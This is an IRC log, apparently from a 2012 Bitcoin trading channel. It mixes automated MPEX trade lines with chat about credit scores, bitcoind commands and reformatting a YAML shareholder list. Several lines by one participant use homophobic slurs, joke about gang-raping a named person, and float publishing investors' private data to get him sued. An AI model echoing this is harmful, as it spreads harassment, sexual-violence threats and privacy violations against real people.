06 02:58:13 noagendamarket: thats... not a good thing Dec 06 02:58:18 [MPEX] [S.MPOE] 16400 @ 0.00051495 = 8.4452 BTC [-] Dec 06 02:58:19 [MPEX] [S.MPOE] 2500 @ 0.00051094 = 1.2774 BTC [-] Dec 06 02:58:21 youre telling me Dec 06 02:58:21 [MPEX] [S.MPOE] 13400 @ 0.00051079 = 6.8446 BTC [-] Dec 06 02:58:22 [MPEX] [S.MPOE] 5100 @ 0.0005074 = 2.5877 BTC [-] Dec 06 02:58:24 i know. what i'm saying is, you don't just call 911 and get a credit check result. Dec 06 02:58:42 mircea_popescu: they could be paying for it Dec 06 02:58:43 ... Dec 06 02:58:46 wait Dec 06 02:58:50 why the fuck are they checking people's _credit_ Dec 06 02:58:59 because reasons. Dec 06 02:59:02 and mathematics. Dec 06 02:59:09 my credit is not exactly 800 points here, doesnt mean Im not a legitimate investor here Dec 06 02:59:48 Well credit ratings include those "stains" on your loaning habits. Dec 06 03:00:09 patrick harnett had credit ratings :D Dec 06 03:00:13 If the rating is good, not necessarily 800 points, they can attribute more points for credit rating I suppose. Dec 06 03:00:15 Namjies: yes, but wouldnt a lower score make you bitcoin friedly? Dec 06 03:00:51 plus, in the US (in every state but 2), stuff like credit cards are unsecured debt Dec 06 03:00:56 credit score doesnt say anything about your ability to repay only that you have not paid before Dec 06 03:01:02 so its not even real money Dec 06 03:01:10 noagendamarket: yeah, exactly Dec 06 03:01:14 so its pointless Dec 06 03:01:25 I think btcjam is running a scam Dec 06 03:01:41 it doesnt say you are an inveterate gambler for instance :P Dec 06 03:02:08 noagendamarket: exactly Dec 06 03:02:09 well Dec 06 03:02:10 Good score says you pay on time and don't overloan. It's a statistical indicator about if the loaner is more or less likely to pay back on time. Dec 06 03:02:13 btcjam and glbse are closer to gambling Dec 06 03:02:18 Not an absolute. Dec 06 03:02:21 Namjies: not really Dec 06 03:02:32 I mean, look at what banks have been doing Dec 06 03:02:40 they've been intentionally forclosing on people's houses illegally Dec 06 03:02:54 thats what they do Dec 06 03:03:00 [MPEX] [S.MPOE] 13408 @ 0.00052028 = 6.9759 BTC [+] Dec 06 03:03:02 [MPEX] [S.MPOE] 1592 @ 0.00052075 = 0.829 BTC [+] Dec 06 03:03:02 even when the people have not missed a payment, a few months later a sherif shows up to throw them out Dec 06 03:03:13 which is 100% illegal in at least 4 ways Dec 06 03:03:21 Barring falsifications... Dec 06 03:03:27 or other such acts. Dec 06 03:03:32 Namjies: barring? fuck, banks dont exist then Dec 06 03:03:36 they retroactively were never invented Dec 06 03:03:50 credit scores are worthless shit now Dec 06 03:03:53 if a bank started offering bitcoin loans I wonder what the default rate would be Dec 06 03:04:03 200% Dec 06 03:04:09 lawl Dec 06 03:04:18 noagendamarket: hrm Dec 06 03:05:13 The loaners would default and the employees would defraud... I mean default the bank further Dec 06 03:05:22 what we need is our own legal CRA Dec 06 03:05:22 even payday lenders have better default rates than bitcoin loans lol Dec 06 03:05:43 and Im pretty sure anyone can run one as long as they comply with the FCRA, FACTA, and FCBA Dec 06 03:05:52 and all the appropriate consumer information protection laws Dec 06 03:06:03 (which is fucking easy, believe it or not) Dec 06 03:06:11 like, all those companies that go LOL WE LOST CUSTOMER DETAILS Dec 06 03:06:12 _how_ Dec 06 03:06:21 operating systems have everything you'll ever need for this built in Dec 06 03:06:25 they stole their own wallets Dec 06 03:06:34 hell, hire a child pornographer or a terrorist, they already know how to do this Dec 06 03:06:37 cant account for that Dec 06 03:06:48 step one: ENCRYPT EVERYTHING \o/ Dec 06 03:06:49 [MPEX] [S.DICE] 1007 @ 0.00328056 = 3.3035 BTC [-] Dec 06 03:06:50 [MPEX] [S.DICE] 400 @ 0.00326684 = 1.3067 BTC [-] Dec 06 03:07:12 but then some retard puts the encryption password in the sites code lol Dec 06 03:07:28 noagendamarket: no Dec 06 03:07:33 you encrypt the disk and network io Dec 06 03:08:07 hell, you can buy raid controllers that use random keys Dec 06 03:08:21 even if you steal the drives out of the rack, it does you nothing, no one knows the key Dec 06 03:10:31 [MPEX] [S.MPOE] 4321 @ 0.00050767 = 2.1936 BTC [-] Dec 06 03:10:32 [MPEX] [S.MPOE] 9800 @ 0.0005074 = 4.9725 BTC [-] Dec 06 03:10:33 [MPEX] [S.MPOE] 12300 @ 0.00050731 = 6.2399 BTC [-] Dec 06 03:10:34 [MPEX] [S.MPOE] 29 @ 0.00050725 = 0.0147 BTC [-] Dec 06 03:11:51 also, did I mention, nefario has sent me an asset list for dmc Dec 06 03:11:56 "Joseph John Aiuppa (pronounced, "I-U-PA") (December 1, 1907 – February 22, 1997), also known as "Doves," "Mourning Doves," "O'Brien," or "Joey Doves," was a Chicago mobster who became a leader of the Chicago Outfit." Dec 06 03:12:01 in case anyone wondered about pigeons. Dec 06 03:12:44 mircea_popescu: I want to say pigeons is from good fellas Dec 06 03:12:44 slander! Dec 06 03:12:46 what is the bitcoind synatax to list addresses by account? Dec 06 03:13:05 dub: listtransactions 'name' 99999999999 Dec 06 03:13:36 the mafia needs to get into bitcoin loans. that might improve the default rate Dec 06 03:13:44 no Dec 06 03:14:03 dub: oh, you want every address used by an accont? Dec 06 03:14:06 pretty sure its listreceivedbyaccount "name" but it doesnt work Dec 06 03:14:07 I dont think you can Dec 06 03:14:16 dub: btw, you CAN do bitcoind help Dec 06 03:14:23 sends help as a json command Dec 06 03:14:24 yeah it doesnt help Dec 06 03:14:32 you can do help legitimatecommand too Dec 06 03:14:53 dub: it may not know that info Dec 06 03:15:09 it shows (incorrect) command syntax only, no help Dec 06 03:15:31 bring it up with sipa and gmaxwell then Dec 06 03:15:37 in #bitcoin-dev Dec 06 03:15:41 okay so Dec 06 03:15:44 Im looking at this asset list Dec 06 03:15:47 that nefario sent me Dec 06 03:15:52 is he gay? Dec 06 03:16:00 seriously, is he a card carrying homosexual? Dec 06 03:16:03 does he suck dicks for a living Dec 06 03:16:56 woah Dec 06 03:17:00 da2ce7_d: hey you Dec 06 03:17:08 how many dmc shares did you own at the end Dec 06 03:17:22 oh... quite a few Dec 06 03:17:28 I cannot remeber exacaly. Dec 06 03:17:31 like 1774? Dec 06 03:17:40 i did this yesterday Dec 06 03:17:45 hmm... maybe around at. Dec 06 03:17:50 this list cant be complete Dec 06 03:17:58 also, WHAT THE FUCK FORMATTING IS THIS Dec 06 03:17:59 did you get neafro's account balances? Dec 06 03:18:03 email@address; Dec 06 03:18:15 :payment_address; 1dongs; Dec 06 03:18:21 :shares; over 9000; Dec 06 03:18:26 seriously, fuck you nefario Dec 06 03:18:34 of all the 9000 ways of acceptably doing this Dec 06 03:18:36 why that Dec 06 03:19:23 nothing a bit of perl cannot solve. Dec 06 03:20:00 or json or csv Dec 06 03:20:05 he "normal" xml Dec 06 03:20:19 pigeons: given any xml format, I can load it in perl Dec 06 03:20:23 [MPEX] [S.MPOE] 6900 @ 0.00051098 = 3.5258 BTC [+] Dec 06 03:20:34 there is at least 3 modules that just load it as hashes Dec 06 03:20:57 oh, its stupidly getaddressesbyaccount Dec 06 03:21:10 http://www.abc.net.au/news/2012-12-05/dark-internet-linked-to-drug-seiz I dont know why people just dont use local drug dealers rather than import it :D Dec 06 03:21:28 because you know, having list and get prefixed commands randomly achieve list and create functionality is rad Dec 06 03:22:14 noagendamarket: I dunno, I prefer Amazon for lots of things Dec 06 03:23:20 1557, 1858, 1310, 1774 Dec 06 03:23:35 6599 Dec 06 03:23:42 the list could be legitimate Dec 06 03:23:54 I wonder if nefario added extra commas for people he doesnt like Dec 06 03:24:47 THERES COMMAS IN THIS?! Dec 06 03:24:59 :o Dec 06 03:25:14 FUCK NEFARIO Dec 06 03:25:28 IN THE HEAD Dec 06 03:25:32 WITH THE WRENCH Dec 06 03:25:37 IN THE LIBRARY Dec 06 03:25:46 Diablo-D3, copy-paste the superfluous data in search & replace. Replace by comma Dec 06 03:25:47 SO HE CAN GET A CLUE Dec 06 03:26:00 Namjies: no Dec 06 03:26:01 it will become a nice email,address,amount csv! Dec 06 03:26:04 need to eat the \ns too Dec 06 03:26:19 so what I need I think is \n\t, Dec 06 03:26:23 er Dec 06 03:26:32 In Notepad++ you can copy/paste linebreaks/tabs/etc Dec 06 03:26:36 s/\n\t:/,/ Dec 06 03:26:37 It works. Dec 06 03:26:42 Namjies: dude Dec 06 03:26:43 Im in fucking vim Dec 06 03:26:52 vim has been able to do regex since before you were born Dec 06 03:27:28 Well solve it with vim then Dec 06 03:27:36 I already just did Dec 06 03:27:50 LOL those arent even fucking tabs Dec 06 03:27:58 its two spaces Dec 06 03:28:20 Well what's the issue? It's the worst formating ever... and? You solve that in a few seconds... Dec 06 03:28:26 Diablo-D3: you got that yaml thing too? Dec 06 03:28:31 smickles: yeah Dec 06 03:28:34 yaml requires spaces in place of tabs Dec 06 03:28:35 what the fuck is this shit its lol Dec 06 03:28:47 It's yaml! Dec 06 03:28:51 yup Dec 06 03:28:58 Ive never heard of yaml Dec 06 03:29:01 why the fuck do we have yaml Dec 06 03:29:13 i knew of it from bukkit Dec 06 03:29:27 YAML = YAML Ain't Markup Language Dec 06 03:29:50 a lot of plugins for bukkit used it for permissions files and such Dec 06 03:29:56 The perfect method to have human readable lists with superflous spaces and stuff! Dec 06 03:30:18 Because humans can't open a csv in an appropriate program for readability... Dec 06 03:30:20 super gay powers unite, Ill form the head. No, the other head. Dec 06 03:30:55 at least youre not goat Dec 06 03:31:03 Poor goat... Dec 06 03:31:14 what happened to goat this time? Dec 06 03:31:21 humans can't open a csv in a spreadsheet program? Dec 06 03:31:30 oh sarcasm Dec 06 03:31:32 sorry! Dec 06 03:35:01 well, if this is yaml, perl has a plugin for it Dec 06 03:35:37 ya know what's awesome, Dec 06 03:35:59 er, module. Dec 06 03:36:08 nefario gave me a bunch of info w/o any privacy requirements attached Dec 06 03:36:25 smickles: me as well Dec 06 03:36:38 so I could just post the entire yaml to the intertubes and then nefario gets sued Dec 06 03:37:02 [MPEX] [S.MPOE] 5800 @ 0.00051098 = 2.9637 BTC [+] Dec 06 03:38:05 I want to go on record that I would sell this data for 1000000 BTC Dec 06 03:38:12 ;) Dec 06 03:38:28 I bid 0.051btc Dec 06 03:38:45 going once... Dec 06 03:39:16 lol, what an aweful joke Dec 06 03:39:42 eh? Dec 06 03:39:45 nefario send out more list? Dec 06 03:39:53 sent* Dec 06 03:39:54 a couple, at least Dec 06 03:40:06 Diablo-D3: yeah, i wrote a custom yaml importor Dec 06 03:40:13 his crap annoyed me Dec 06 03:40:30 Ukto: erm, but it takes three regex Dec 06 03:40:35 anyway, the data is potentially out there anyway, i mean, he sent the data w/o encryption Dec 06 03:40:36 or one if you feel like getting clever Dec 06 03:40:45 not the ones I was given to test with Dec 06 03:40:58 in vim, %s/\n /,/g Dec 06 03:41:08 %s/:payment_address//g Dec 06 03:41:15 %s/:shares//g Dec 06 03:41:32 yeah Dec 06 03:41:41 i was not writing in vim Dec 06 03:41:50 you can do that in perl as well Dec 06 03:41:51 I made an autoamted system for other ppl to upload the yaml file into my system Dec 06 03:42:12 and in perl, you can just use the yaml module anyhow Dec 06 03:42:15 well, i made the importor based on yaml standards, not know what crap nefario might do Dec 06 03:42:24 and I hadnt seen how simple the file data was at the time yet Dec 06 03:42:28 until after i made it Dec 06 03:42:48 yeah, yaml advertises itself to be fucking simple Dec 06 03:42:52 [MPEX] [S.MPOE] 4321 @ 0.00051139 = 2.2097 BTC [+] Dec 06 03:42:52 [MPEX] [S.MPOE] 20779 @ 0.00051157 = 10.6299 BTC [+] Dec 06 03:43:38 i only spent what.. 30 min? to make the importer :P Dec 06 03:43:45 but then the claim management system Dec 06 03:43:47 i spent a few hours on it Dec 06 03:43:54 wanna spend a few more to add some extra niftyness Dec 06 03:43:59 actually, I wonder if perl ships with the yaml module now Dec 06 03:44:18 nope but Dec 06 03:44:27 ii libyaml-perl 0.84-1 all YAML Ain't Markup Language Dec 06 03:44:28 ii libyaml-syck-perl 1.21-1 amd64 Perl module providing a fast, lightweight YAML loader and dumper Dec 06 03:44:28 ii libyaml-tiny-perl 1.51-1 all Perl module for reading and writing YAML files Dec 06 03:44:30 they're packaged in debian :D Dec 06 03:44:40 and for some reason, I already have them installed Dec 06 03:44:44 I wonder what Im using that uses it Dec 06 03:44:55 did he post anywhere who all got lists? Dec 06 03:45:01 Ukto: no Dec 06 03:45:11 Im tempted to just say I never got mine just to cause trouble Dec 06 03:45:17 lol Dec 06 03:45:20 I should pay him back for all the trouble hes caused me Dec 06 03:45:32 and my investors too Dec 06 03:45:50 I wonder if I should like just show up at his house with everybody and just gangrape him Dec 06 03:45:58 have fun Dec 06 03:46:05 I mean, Im not gay, and most of my investors arent gay, but theres nothing like a hatefuck. Dec 06 03:46:20 reality check pls Dec 06 03:46:31 okay SOME of my investors arent gay Dec 06 03:48:11 so this is quote lulzy Dec 06 03:48:52 nefario posts on reddit in support of Amir using socky Dec 06 03:49:01 url Dec 06 03:49:19 suggestion is made that he get back to fixing his fuckup Dec 06 03:49:19 why dont you people learn to paste it Dec 06 03:49:21 ??? Dec 06 03:49:24 its been pasted Dec 06 03:49:28 a bunch of asset lists get sent Dec 06 03:49:32 didnt he delete his comment? Dec 06 03:49:55 yes Dec 06 03:50:01 kakobrekla: http://www.reddit.com/r/Bitcoin/comments/14cj3r/amir_taaki_aka_genjix_shows_how_not_to_promote/ Dec 06 03:50:04 it was "this guy [taaki] doesn't seem bad, he seems real enthusiastic, why don't you like him, he's just nervous" Dec 06 03:50:08 thank you Dec 06 03:50:59 when we mentioned in this channel that dublinclontarf is nefario, he deleted it Dec 06 03:51:31 hi nefario Dec 06 03:51:54 it was after the comment directed at him to be fair Dec 06 03:53:00 ah Dec 06 03:53:07 why you gotta be fair? Dec 06 03:53:46 i still want mircea_popescu to watch the video Dec 06 03:55:20 didnt he? Dec 06 03:55:47 nope Dec 06 03:56:05 he's afraid of aids Dec 06 03:56:38 he had "the girl" transacribe it Dec 06 03:57:01 hehehe Dec 06 03:57:06 wicked. Dec 06 03:58:14 bitdaytrade>>You should be really stopping trashing my name, Dec 06 03:58:16 jeez Dec 06 03:58:23 this guys still has balls to login. Dec 06 03:58:30 [MPEX] [S.MPOE] 4321 @ 0.00051103 = 2.2082 BTC [-] Dec 06 03:58:32 [MPEX] [S.MPOE] 16988 @ 0.00051098 = 8.6805 BTC [-] Dec 06 04:02:30 [MPEX] [S.MPOE] 20691 @ 0.0005106 = 10.5648 BTC [-] Dec 06 04:02:32 [MPEX] [S.MPOE] 6511 @ 0.00051157 = 3.3308 BTC [+] Dec 06 04:02:32 [MPEX] [S.MPOE] 898 @ 0.00052075 = 0.4676 BTC [+] Dec 06 04:05:48 [MPEX] [S.MPOE] 4321 @ 0.00051021 = 2.2046 BTC [-] Dec 06 04:05:50 [MPEX] [S.MPOE] 11779 @ 0.00050995 = 6.0067 BTC [-] Dec 06 04:05:58 kakobrekla where did he leave that comment ? Dec 06 04:06:56 https://bitcointalk.org/index.php?topic=93445.420 Dec 06 04:07:09 2 hrs ago Dec 06 04:07:13 [MPEX] [S.DICE] 186 @ 0.00320667 = 0.5964 BTC [-] Dec 06 04:07:15 [MPEX] [S.DICE] 1506 @ 0.00320333 = 4.8242 BTC [-] Dec 06 04:07:19 or something Dec 06 04:08:12 pigeons not the girl, some other girl. Dec 06 04:10:28 so since people are throwing shit about : Dec 06 04:10:32 ;;google mircea popescu birda Dec 06 04:10:33 Mircea Popescu - Sesiune training Birda, Timis on Vimeo: ; Chem. Bull. `POLITEHNICA` Univ. Timisoara - Chemical Bulletin of ...: ; Cuprins - Journal of Horticulture, Forestry and Biotechnology: Dec 06 04:10:37 hum Dec 06 04:10:59 that first link there is me talking to the worst possible audience : some rural community of ~200 souls in the depths of romania Dec 06 04:11:09 on the campaign trail, so tis politics. Dec 06 04:12:06 [MPEX] [S.MPOE] 4321 @ 0.00051982 = 2.2461 BTC [+] Dec 06 04:12:08 [MPEX] [S.MPOE] 8255 @ 0.00051999 = 4.2925 BTC [+] Dec 06 04:12:19 transcription plox Dec 06 04:12:30 (jokes :) Dec 06 04:12:36 http://vimeo.com/5236831 that's also me, talking to a moar urban crowd (party headquarters, timisoara) Dec 06 04:13:26 dub the second is transcripted hiar : http://trilema.com/2009/banii-oamenii-si-valorile-liberale/ Dec 06 04:14:07 lol at the camera rotation in the first Dec 06 04:14:29 yeah well. Dec 06 04:14:39 anyway, they're not prepared speeches, either of them. Dec 06 04:16:10 at 5:50 second speach i hear some "kilograme" Dec 06 04:16:17 is this about cherries? Dec 06 04:16:37 cocaine Dec 06 04:16:53 kilogram Dec 06 04:17:58 pfff.... Dec 06 04:18:19 Processing lots of claims and updating spreadsheets. Dec 06 04:18:32 Because manual work is so much better than platform work eh. Dec 06 04:19:12 but anyway, that last speech is basically me advocating bitcoin, of sorts. in 2008 iirc. Dec 06 04:25:31 [MPEX] [S.MPOE] 4321 @ 0.00051019 = 2.2045 BTC [-] Dec 06 04:25:32 [MPEX] [S.MPOE] 7279 @ 0.00050995 = 3.7119 BTC [-] Dec 06 04:30:25 [MPEX] [S.DICE] 543 @ 0.00321526 = 1.7459 BTC [+] Dec 06 04:37:41 [MPEX] [S.MPOE] 4321 @ 0.0005115 = 2.2102 BTC [+] Dec 06 04:37:43 [MPEX] [S.MPOE] 18029 @ 0.00051154 = 9.2226 BTC [+] Dec 06 04:40:11 [MPEX] [S.MPOE] 4321 @ 0.00051027 = 2.2049 BTC [-] Dec 06 04:40:12 [MPEX] [S.MPOE] 3342 @ 0.00050995 = 1.7043 BTC [-] Dec 06 04:40:14 [MPEX] [S.MPOE] 5200 @ 0.0005092 = 2.6478 BTC [-] Dec 06 04:58:43 [MPEX] [S.MPOE] 3741 @ 0.0005089 = 1.9038 BTC [-] Dec 06 04:58:44 [MPEX] [S.MPOE] 4321 @ 0.00051142 = 2.2098 BTC [+] Dec 06 04:58:46 [MPEX] [S.MPOE] 4921 @ 0.00051154 = 2.5173 BTC [+] Dec 06 04:58:47 [MPEX] [S.MPOE] 20199 @ 0.00051999 = 10.5033 BTC [+] Dec 06 05:07:12 [MPEX] [S.MPOE] 4321 @ 0.00051983 = 2.2462 BTC [-] Dec 06 05:07:13 [MPEX] [S.MPOE] 4505 @ 0.00051999 = 2.3426 BTC [+] Dec 06 05:07:15 [MPEX] [S.MPOE] 841 @ 0.00052075 = 0.438 BTC [+] Dec 06 05:12:09 [MPEX] [S.MPOE] 7201 @ 0.00052075 = 3.7499 BTC [+] Dec 06 05:12:10 [MPEX] [S.MPOE] 9100 @ 0.00052112 = 4.7422 BTC [+] Dec 06 05:12:12 [MPEX] [S.MPOE] 5999 @ 0.0005217 = 3.1297 BTC [+] Dec 06 05:19:51 [MPEX] [S.MPOE] 3755 @ 0.00050748 = 1.9056 BTC [-] Dec 06 05:30:55 [MPEX] [S.MPOE] 566 @ 0.00050748 = 0.2872 BTC [-] Dec 06 05:30:57 [MPEX] [S.MPOE] 7334 @ 0.00050725 = 3.7202 BTC [-] Dec 06 05:34:26 [MPEX] [S.DICE] 2900 @ 0.00328234 = 9.5188 BTC [+] Dec 06 05:38:54 [MPEX] [S.MPOE] 4321 @ 0.00052145 = 2.2532 BTC [+] Dec 06 05:38:55 [MPEX] [S.MPOE] 3851 @ 0.0005217 = 2.0091 BTC [+] Dec 06 05:38:57 [MPEX] [S.MPOE] 20800 @ 0.00052176 = 10.8526 BTC [+] Dec 06 05:38:58 [MPEX] [S.MPOE] 3881 @ 0.00052289 = 2.0293 BTC [+] Dec 06 05:38:59 [MPEX] [S.MPOE] 5165 @ 0.00052347 = 2.7037 BTC [+] Dec 06 05:57:20 http://www.ebay.com/itm/MISSILETOE-KISS-GUARANTEED-FUNNY-CHRISTMAS-TREE-DECORATION-ORNAMENT-/130814270579?pt=LH_DefaultDomain_0&hash=item1e75235c73 Dec 06 05:57:34 [09:16:11] at 5:50 second speach i hear some "kilograme" Dec 06 05:57:35 [09:16:18] is this about cherries? Dec 06 05:58:31 my penis is often weighed in kilograms by british chicks. Dec 06 06:03:04 <[\\\]> only by the bitches that failed mathclass and never heard of using mg Dec 06 06:05:42 [MPEX] [S.MPOE] 15075 @ 0.00052347 = 7.8913 BTC [+] Dec 06 06:05:43 [MPEX] [S.MPOE] 10340 @ 0.00052372 = 5.4153 BTC [+] Dec 06 06:05:45 [MPEX] [S.MPOE] 3743 @ 0.00052373 = 1.9603 BTC [+] Dec 06 06:06:23 [\\\]: integer kilograms. Dec 06 06:09:06 right, (milli)kilograms. That could be shortened to their accurate denomination: grams. Dec 06 06:12:08 it's mili you know Dec 06 06:14:21 http://en.wikipedia.org/wiki/SI_prefix Dec 06 06:14:23 milli Dec 06 06:19:07 [MPEX] [S.MPOE] 4321 @ 0.00051981 = 2.2461 BTC [-] Dec 06 06:19:08 [MPEX] [S.MPOE] 32350 @ 0.00051977 = 16.8146 BTC [-] Dec 06 06:19:09 [MPEX] [S.MPOE] 16300 @ 0.00051788 = 8.4414 BTC [-] Dec 06 06:19:11 [MPEX] [S.MPOE] 12900 @ 0.00051671 = 6.6656 BTC [-] Dec 06 06:19:12 [MPEX] [S.MPOE] 1429 @ 0.00051278 = 0.7328 BTC [-] Dec 06 06:22:35 its faster Dec 06 06:23:09 drat. Dec 06 06:23:52 [MPEX] [S.MPOE] 6200 @ 0.0005138 = 3.1856 BTC [+] Dec 06 06:23:55 [MPEX] [S.MPOE] 4321 @ 0.00051307 = 2.217 BTC [-] Dec 06 06:23:56 [MPEX] [S.MPOE] 24745 @ 0.00051278 = 12.6887 BTC [-] Dec 06 06:26:27 [MPEX] [S.DICE] 2575 @ 0.00330307 = 8.5054 BTC [+] Dec 06 06:26:29 [MPEX] [S.DICE] 588 @ 0.00333234 = 1.9594 BTC [+] Dec 06 06:26:29 [MPEX] [S.DICE] 1000 @ 0.00333813 = 3.3381 BTC [+] Dec 06 06:26:30 [MPEX] [S.DICE] 387 @ 0.0033437 = 1.294 BTC [+] Dec 06 06:37:25 [MPEX] [S.MPOE] 20250 @ 0.00052108 = 10.5519 BTC [+] Dec 06 06:46:02 [MPEX] [S.DICE] 2400 @ 0.0033437 = 8.0249 BTC [+] Dec 06 06:49:15 [MPEX] [S.MPOE] 8550 @ 0.00052108 = 4.4552 BTC [+] Dec 06 06:49:16 [MPEX] [S.MPOE] 15050 @ 0.00051628 = 7.77 BTC [-] Dec 06 06:52:13 [MPEX] [S.MPOE] 23600 @ 0.00051628 = 12.1842 BTC [-] Dec 06 06:53:40 [MPEX] [S.MPOE] 5800 @ 0.00051628 = 2.9944 BTC [-] Dec 06 06:57:06 [MPEX] [S.MPOE] 5195 @ 0.00051628 = 2.6821 BTC [-] Dec 06 07:03:45 [MPEX] [S.MPOE] 19600 @ 0.00051279 = 10.0507 BTC [-] Dec 06 07:03:45 [MPEX] [S.MPOE] 1717 @ 0.00051278 = 0.8804 BTC [-] Dec 06 07:04:40 [MPEX] [S.MPOE] 4321 @ 0.0005148 = 2.2245 BTC [+] Dec 06 07:04:41 [MPEX] [S.MPOE] 19805 @ 0.00051503 = 10.2002 BTC [+] Dec 06 07:04:43 [MPEX] [S.MPOE] 4916 @ 0.00052231 = 2.5677 BTC [+] Dec 06 07:09:36 [MPEX] [S.DICE] 1107 @ 0.00328234 = 3.6336 BTC [-] Dec 06 07:09:38 [MPEX] [S.DICE] 2793 @ 0.00325533 = 9.0921 BTC [-] Dec 06 07:14:13 [MPEX] [S.MPOE] 4321 @ 0.00051309 = 2.2171 BTC [-] Dec 06 07:14:14 [MPEX] [S.MPOE] 2988 @ 0.00051279 = 1.5322 BTC [-] Dec 06 07:14:16 [MPEX] [S.MPOE] 31691 @ 0.00051278 = 16.2505 BTC [-] Dec 06 07:16:38 https://bitcointalk.org/index.php?topic=129382.msg1381456;topicseen#msg1381456 not sure if serious Dec 06 07:17:57 0! is defined as =1 Dec 06 07:28:02 [MPEX] [S.MPOE] 4321 @ 0.00052225 = 2.2566 BTC [+] Dec 06 07:28:03 [MPEX] [S.MPOE] 12984 @ 0.00052231 = 6.7817 BTC [+] Dec 06 07:28:05 [MPEX] [S.MPOE] 8445 @ 0.00052373 = 4.4229 BTC [+] Dec 06 07:37:36 [MPEX] [S.MPOE] 4321 @ 0.00052361 = 2.2625 BTC [-] Dec 06 07:37:38 [MPEX] [S.MPOE] 6712 @ 0.00052373 = 3.5153 BTC [+] Dec 06 07:37:39 [MPEX] [S.MPOE] 3167 @ 0.00052474 = 1.6619 BTC [+] Dec 06 07:47:07 [MPEX] [S.MPOE] 11400 @ 0.00051741 = 5.8985 BTC [-] Dec 06 07:47:09 [MPEX] [S.MPOE] 4321 @ 0.00051295 = 2.2165 BTC [-] Dec 06 07:47:10 [MPEX] [S.MPOE] 8379 @ 0.00051278 = 4.2966 BTC [-] Dec 06 07:56:43 [MPEX] [S.MPOE] 4321 @ 0.00052312 = 2.2604 BTC [+] Dec 06 07:56:44 [MPEX] [S.MPOE] 20600 @ 0.00052311 = 10.7761 BTC [-] Dec 06 07:58:52 mircea_popescu: wait, what? Dec 06 08:01:40 hm ? Dec 06 08:02:21 [12:17:58] 0! is defined as =1 Dec 06 08:02:33 it is. Dec 06 08:02:59 okay, I fail higher math, what is 0!? Dec 06 08:03:23 zero factorial. Dec 06 08:03:33 ;;calc 7! Dec 06 08:03:34 Error: unexpected EOF while parsing (, line 1) Dec 06 08:03:40 awell. Dec 06 08:06:25 [MPEX] [S.MPOE] 4321 @ 0.00052207 = 2.2559 BTC [-] Dec 06 08:06:26 [MPEX] [S.MPOE] 16097 @ 0.00052235 = 8.4083 BTC [+] Dec 06 08:06:27 [MPEX] [S.MPOE] 3382 @ 0.00052408 = 1.7724 BTC [+] Dec 06 08:38:14 [MPEX] [S.MPOE] 4321 @ 0.00052379 = 2.2633 BTC [-] Dec 06 08:38:15 [MPEX] [S.MPOE] 29479 @ 0.00052408 = 15.4494 BTC [+] Dec 06 08:54:50 [MPEX] [S.MPOE] 10050 @ 0.00052408 = 5.267 BTC [+] Dec 06 08:58:38 [MPEX] [S.MPOE] 4321 @ 0.00052231 = 2.2569 BTC [-] Dec 06 09:01:01 [MPEX] [S.MPOE] 1729 @ 0.00052223 = 0.9029 BTC [-] Dec 06 09:01:01 [MPEX] [S.MPOE] 29871 @ 0.00052408 = 15.6548 BTC [+] Dec 06 09:06:48 [MPEX] [S.MPOE] 4321 @ 0.00052373 = 2.263 BTC [-] Dec 06 09:06:50 [MPEX] [S.MPOE] 15991 @ 0.00052408 = 8.3806 BTC [+] Dec 06 09:06:51 [MPEX] [S.MPOE] 2983 @ 0.00052474 = 1.5653 BTC [+] Dec 06 09:06:52 [MPEX] [S.MPOE] 5156 @ 0.0005253 = 2.7084 BTC [+] Dec 06 09:13:38 [MPEX] [S.MPOE] 8943 @ 0.0005253 = 4.6978 BTC [+] Dec 06 09:13:39 [MPEX] [S.MPOE] 5600 @ 0.00052624 = 2.9469 BTC [+] Dec 06 09:13:41 [MPEX] [S.MPOE] 6507 @ 0.00052645 = 3.4256 BTC [+] Dec 06 09:33:35 [MPEX] [S.MPOE] 11700 @ 0.00052616 = 6.1561 BTC [-] Dec 06 09:33:37 [MPEX] [S.MPOE] 1750 @ 0.000525 = 0.9188 BTC [-] Dec 06 09:40:49 [MPEX] [S.MPOE] 1255 @ 0.00052645 = 0.6607 BTC [+] Dec 06 09:40:51 [MPEX] [S.MPOE] 10045 @ 0.00052656 = 5.2893 BTC [+] Dec 06 09:44:58 [MPEX] [S.MPOE] 24153 @ 0.000525 = 12.6803 BTC [-] Dec 06 09:57:55 [MPEX] [S.MPOE] 4005 @ 0.00052656 = 2.1089 BTC [+] Dec 06 09:58:36 [MPEX] [S.MPOE] 8250 @ 0.00052656 = 4.3441 BTC [+] Dec 06 09:58:38 [MPEX] [S.MPOE] 5750 @ 0.00052665 = 3.0282 BTC [+] Dec 06 10:01:27 [MPEX] [S.MPOE] 6850 @ 0.00052665 = 3.6076 BTC [+] Dec 06 10:01:28 [MPEX] [S.MPOE] 11350 @ 0.00052677 = 5.9788 BTC [+] Dec 06 10:11:55 [MPEX] [S.MPOE] 15200 @ 0.00052677 = 8.0069 BTC [+] Dec 06 10:11:57 [MPEX] [S.MPOE] 10361 @ 0.00052683 = 5.4585 BTC [+] Dec 06 10:14:23 [MPEX] [S.MPOE] 9363 @ 0.00052683 = 4.9327 BTC [+] Dec 06 10:14:24 [MPEX] [S.MPOE] 2587 @ 0.0005269 = 1.3631 BTC [+] Dec 06 10:18:50 [MPEX] [S.MPOE] 32647 @ 0.000525 = 17.1397 BTC [-] Dec 06 10:18:51 [MPEX] [S.MPOE] 19553 @ 0.00052376 = 10.2411 BTC [-] Dec 06 10:19:55 [MPEX] [S.MPOE] 97 @ 0.00052376 = 0.0508 BTC [-] Dec 06 10:19:57 [MPEX] [S.MPOE] 18603 @ 0.00052263 = 9.7225 BTC [-] Dec 06 10:44:17 [MPEX] [S.MPOE] 31550 @ 0.0005269 = 16.6237 BTC [+] Dec 06 10:45:00 [MPEX] [S.MPOE] 4016 @ 0.0005269 = 2.116 BTC [+] Dec 06 10:45:01 [MPEX] [S.MPOE] 18334 @ 0.00052709 = 9.6637 BTC [+] Dec 06 10:48:54 [MPEX] [S.MPOE] 8097 @ 0.00052709 = 4.2678 BTC [+] Dec 06 10:51:42 [MPEX] [S.MPOE] 4321 @ 0.00052264 = 2.2583 BTC [-] Dec 06 10:51:43 [MPEX] [S.MPOE] 17181 @ 0.00052263 = 8.9793 BTC [-] Dec 06 10:55:53 [MPEX] [S.MPOE] 4321 @ 0.00052686 = 2.2766 BTC [+] Dec 06 10:55:55 [MPEX] [S.MPOE] 1569 @ 0.00052709 = 0.827 BTC [+] Dec 06 10:55:55 [MPEX] [S.MPOE] 4050 @ 0.00052718 = 2.1351 BTC [+] Dec 